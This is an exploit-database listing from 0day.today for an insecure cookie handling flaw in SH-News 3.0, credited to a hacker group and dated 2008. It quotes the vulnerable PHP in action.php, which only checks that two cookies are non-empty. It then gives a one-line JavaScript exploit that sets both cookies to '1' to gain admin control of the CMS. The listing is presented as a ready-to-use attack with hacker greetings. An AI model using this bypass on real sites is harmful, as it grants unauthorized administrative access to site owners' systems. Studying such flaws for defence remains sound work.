[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SH-News 3.0 Insecure Cookie Handling Vulnerability

Author
0day Today Team
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3193
Category
web applications
Date add
14-06-2008
Platform
unsorted
==================================================
SH-News 3.0 Insecure Cookie Handling Vulnerability
==================================================



	     ########################################################################
             #                                                                      #
             #  ...:::::SH-News 3.0 Insecure Cookie Handling Vulnerability ::::.... #          
             ########################################################################


--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------
vuln code in action.php:
line 66: $shuser = $HTTP_COOKIE_VARS[shuser];
line 67: $shpass = $HTTP_COOKIE_VARS[shpass];
...
line 69: if((!$shuser) || (!$shpass)) { header("Location: login.php"); }
---
exploit:
javascript:document.cookie = "shuser=1; path=/"; document.cookie = "shpass=1; path=/";
-----
now you can access to action.php whit admin access and manage the cms ;)
-------



#  0day.today [2024-12-25]  #